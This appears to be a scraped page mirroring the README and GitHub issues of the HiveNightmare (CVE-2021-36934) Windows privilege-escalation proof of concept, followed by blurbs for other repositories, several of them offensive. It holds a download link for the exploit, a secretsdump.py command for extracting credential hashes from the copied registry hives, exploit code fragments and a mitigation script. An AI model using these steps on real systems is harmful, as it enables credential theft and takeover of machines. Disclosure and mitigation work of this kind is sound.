Exploit allowing you to read registry hives as non-admin on Windows 10 and 11

HiveNightmare

aka SeriousSam, or now CVE-2021–36934. Exploit allowing you to read any registry hives as non-admin.

What is this?

An zero day exploit for HiveNightmare, which allows you to retrieve all registry hives in Windows 10 as a non-administrator user. For example, this includes hashes in SAM, which can be used to execute code as SYSTEM.

Download

This is the direct download link for most recent version: https://github.com/GossiTheDog/HiveNightmare/raw/master/Release/HiveNightmare.exe

Authors

  • Discovered by @jonasLyk.
  • PoC by @GossiTheDog, powered by Porgs.
  • Additions by @0xblacklight, @DHerls, @HynekPetrak

Scope

Works on all supported versions of Windows 10, where System Protection is enabled (should be enabled by default in most configurations).

How does this work?

The permissions on key registry hives are set to allow all non-admin users to read the files by default, in most Windows 10 configurations. This is an error.

What does the exploit do?

Allows you to read SAM data (sensitive) in Windows 10, as well as the SYSTEM and SECURITY hives.

This exploit uses VSC to extract the SAM, SYSTEM, and SECURITY hives even when in use, and saves them in current directory as HIVENAME-haxx, for use with whatever cracking tools, or whatever, you want.

Pulling Credentials out

python3 secretsdump.py -sam SAM-haxx -system SYSTEM-haxx -security SECURITY-haxx LOCAL

More info?

I wrote a blog: https://doublepulsar.com/hivenightmare-aka-serioussam-anybody-can-read-the-registry-in-windows-10-7a871c465fa5

Alt Image text

Video of exploit: https://www.youtube.com/watch?v=5zdIq6t3DOw

Comments
  • Getting error

    Getting error "Could not open SAM" on Windows 10.0.19043.1055

    To start, I know this 'exploit' (for lack of a better term) is very new and still being explored. I'm not expecting anyone to solve my issues, but wanted to get information out there in case others are running into the same issue and if any of us (myself included) can solve it, it may help others.

    When running this I'm getting an error that it could not open the SAM:

    C:\Users\User1\Downloads\HiveNightmare-master\HiveNightmare-master\Release>.\HiveNightmare.exe
    Could not open SAM :( Is System Protection not enabled or vulnerability fixed?  Note currently hardcoded to look for first 4 VSS snapshots only - list snapshots with vssadmin list shadows
    C:\Users\User1\Downloads\HiveNightmare-master\HiveNightmare-master\Release>
    

    Currently running Windows [Version 10.0.19043.1055] and can see that the user permissions read for the SAM database. This is a domain joined computer in my lab with no other changes made. The image is the latest VM for developers.

    C:\Windows\system32>icacls c:\Windows\system32\config\SAM
    c:\Windows\system32\config\SAM BUILTIN\Administrators:(I)(F)
                                   NT AUTHORITY\SYSTEM:(I)(F)
                                   BUILTIN\Users:(I)(RX)
                                   APPLICATION PACKAGE AUTHORITY\ALL APPLICATION PACKAGES:(I)(RX)
                                   APPLICATION PACKAGE AUTHORITY\ALL RESTRICTED APPLICATION PACKAGES:(I)(RX)
    
    Successfully processed 1 files; Failed processing 0 files
    
    C:\Windows\system32>
    

    I did try the command suggested in the error and it looks like it can't find any shadow copies.

    C:\Users\User1\Downloads\HiveNightmare-master\HiveNightmare-master\Release>vssadmin list shadows
    vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool
    (C) Copyright 2001-2013 Microsoft Corp.
    
    No items found that satisfy the query.
    
    C:\Users\User1\Downloads\HiveNightmare-master\HiveNightmare-master\Release>
    

    On my non-domain joined hosts it does not show that the users can read the SAM database, so I'm not sure if this requires domain joining or if it's just me.

    If I find a solution, I'll update this. If anyone else has any thoughts/ideas I would welcome them.

  • Handle leak during search for youngest file

    Handle leak during search for youngest file

    This loop over the snapshots opens each one to get its filetime to find the earliest one. The handle to the youngest file is returned. However, the loop never calls CloseHandle on the files it passes by. These will be closed at main exit but it is still correct to dispose of them properly.

        for (int i = 1; i <= maxSearch; i++) {
            wchar_t fullPath[MAX_PATH];
            swprintf_s(fullPath, MAX_PATH, L"%s%d\\%s", base, i, path);
    
            hfile = CreateFile(fullPath, GENERIC_READ, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
            if (hfile != INVALID_HANDLE_VALUE) {
                if (GetFileTime(hfile, &creationTime, &lastAccessTime, &lastWriteTime)) {
                    if (CompareFileTime(&youngest, &lastWriteTime) < 0) {
                        retHandle = hfile;
                        youngest = lastWriteTime;
                        wcout << "Newer file found: " << fullPath << endl;
                    }
    +                else {
    +                   CloseHandle(hfile);
    +                }
                }
            }
        }
    

    https://github.com/GossiTheDog/HiveNightmare/blob/042805345e071cb3aa7bf6d8a9dc6a4f7c147269/HiveNightmare/HiveNightmare.cpp#L33

  • Add SYSTEM and SECURITY hives

    Add SYSTEM and SECURITY hives

    messy copy-pasting to add reading the SYSTEM and SECURITY hives and writing them out to disk, as well as instructions in the README on how to use secretsdump.py to crack them

  • Take latest shadow copy & handle unicode output

    Take latest shadow copy & handle unicode output

    Hi, This pull request comprise:

    1. Always extract the newest shadow copy - usually the highest ID.

    2. adjusted unicode output to console (_setmode & wcout), although not required. I needed it while printing out date formated in current locale (czech) to the console.

  • $checkShadow is $null when no shadow copies exist

    $checkShadow is $null when no shadow copies exist

    On at least Windows 10 20H2 (19042.1110), Get-WmiObject Win32_ShadowStorage returns $null when shadow copies are not configured and none exist.

    This lead to $fixed = $false, when in fact the issue is fixed.

    Recommend updating to the following:

    #check shadow
    if ($vulnerable -eq $true) {
        $checkShadow = Get-WmiObject Win32_ShadowStorage -Property UsedSpace | Select-Object -ExpandProperty UsedSpace
        if ((0 -eq $checkShadow) -or ($null -eq $checkShadow)) {
            $shadowSucces = $true
            Write-Host "Successfully deleted old volume shadow copies."
        }
        else {
            $shadowSucces = $false
            write-host "Shadow deletion failed. Security software may be blocking this action or check running permissions."
        }
    }
    

    https://github.com/GossiTheDog/HiveNightmare/blob/042805345e071cb3aa7bf6d8a9dc6a4f7c147269/Mitigation.ps1#L40

Some hypervisor research notes. There is also a useful exploit template that you can use to verify / falsify any assumptions you may make while auditing code, and for exploit development.

Introduction Over the past few weeks, I've been doing some hypervisor research here and there, with most of my focus being on PCI device emulation cod

Nov 18, 2022
Just another "Won't Fix" Windows Privilege Escalation from User to Domain Admin.
Just another

RemotePotato0 Just another "Won't Fix" Windows Privilege Escalation from User to Domain Admin. RemotePotato0 is an exploit that allows you to escalate

Nov 25, 2022
A simple PoC to demonstrate that is possible to write Non writable memory and execute Non executable memory on Windows

WindowsPermsPoC A simple PoC to demonstrate that is possible to write Non writable memory and execute Non executable memory on Windows You can build i

Jul 21, 2022
Registry viewer, editor and profile saver
Registry viewer, editor and profile saver

Registry Profiler This app allows certain registry values like the ones for brightness & volume to change and saved into profiles. The first menu give

Feb 6, 2022
This repository contains machine-readable files for the SPIR-V Registry

SPIR-V Headers This repository contains machine-readable files for the SPIR-V Registry. This includes: Header files for various languages. JSON files

Nov 17, 2022
Had a tough time playing Microsoft Wordament ? Well WORDament_Solver has your back. It suggests you meaningful words you can use while playing the game and help you top the leaderboard.
Had a tough time playing Microsoft Wordament ? Well WORDament_Solver has your back. It suggests you meaningful words you can use while playing the game and help you top the leaderboard.

WORDament_Solver Had a tough time playing Microsoft Wordament ? Well WORDament_Solver has your back. It suggests you meaningful words you can use whil

Aug 19, 2021
A simple Roblox exploit written in C++ Everything in the C++ file is original work besides the dependencies, free for you to use.

headhunter A simple Roblox exploit written in C++ Everything in the C++ file is original work besides the dependencies, free for you to use. This code

Nov 4, 2022
Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.
Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.

Thread Stack Spoofing PoC A PoC implementation for an advanced in-memory evasion technique that spoofs Thread Call Stack. This technique allows to byp

Nov 26, 2022
This software brings you the possibility to Read and Write the internal Flash of the Nordic nRF52 series with an ESP32
This software brings you the possibility to Read and Write the internal Flash of the Nordic nRF52 series with an ESP32

ESP32 nRF52 SWD flasher This software brings you the possibility to Read and Write the internal Flash of the Nordic nRF52 series with an ESP32 using t

Nov 24, 2022
Get Next Line is a project at 42. It is a function that reads a file and allows you to read a line ending with a newline character from a file descriptor

Get Next Line is a project at 42. It is a function that reads a file and allows you to read a line ending with a newline character from a file descriptor. When you call the function again on the same file, it grabs the next line

Nov 15, 2022
ESP32 + GitHub Actions + Husarnet. A boilerplate project for ESP32 allowing in-field firmware update using GitHub Actions workflow.

esp32-internet-ota ESP32 + GitHub Actions + Husarnet. A boilerplate project for ESP32 allowing in-field firmware update using GitHub Actions workflow.

Sep 22, 2022
A set of tools allowing JUCE 6.1 + Cmake to build a CLAP

JUCE6/CMake Clap Support This is a set of code which, combined with a JUCE6/CMake project, allows you to build a (buggy, feature incomplete, work in p

Feb 15, 2022
Turn your ESP32 into a easy to use micro web-server allowing to interact with any GPIO by simple http(s) calls.

WebhooksTriggeredESP32WiFi Turn your ESP32 into an easy to use and manage wireless micro web-server allowing it to process reliably and asynchronouly

Nov 24, 2022
Beacon Object File allowing creation of Beacons in different sessions.
Beacon Object File allowing creation of Beacons in different sessions.

JumpSession_BOF This is a Beacon Object File allowing creation of Beacons in different sessions. Must be Elevated. This BOF was created on the heels o

Nov 18, 2022
This is a set of utilities that allow you to read, write or erase SPI flash chips using a Raspberry Pi Pico (RP2040) chip.

Pico SPI Utilities This is a set of utilities that allow you to read, write or erase SPI flash chips using a Raspberry Pi Pico (RP2040) chip. While th

Aug 7, 2022
My exploit for CVE-2021-40449, a Windows LPE via a UAF in win32kfull!GreResetDCInternal.
My exploit for CVE-2021-40449, a Windows LPE via a UAF in win32kfull!GreResetDCInternal.

CVE-2021-40449 My exploit for CVE-2021-40449, a Windows LPE via a UAF in win32kfull!GreResetDCInternal. short wu along with the UAF vulnerabilty other

Oct 19, 2022
A personal collection of Windows CVE I have turned in to exploit source, as well as a collection of payloads I've written to be used in conjunction with these exploits.

This repository contains a personal collection of Windows CVE I have turned in to exploit source, as well as a collection of payloads I've written to

Nov 11, 2022
Haxe native extension to read and write windows clipboard.

Haxe Clipboard This is a native library to read and write clipboard data from Haxe. It uses Ammer to generate bindings. Note: This is a Windows only l

Nov 11, 2022
List & Read the processes memory using Windows APIs (PSAPI/ToolHelpAPI/WTSAPI)
List & Read the processes memory using Windows APIs (PSAPI/ToolHelpAPI/WTSAPI)

Dumper List & Read the processes memory using Windows APIs PSAPI ToolHelp WTSAPI Usage The Dumper tool list the running procceses and provide the abil

Oct 12, 2022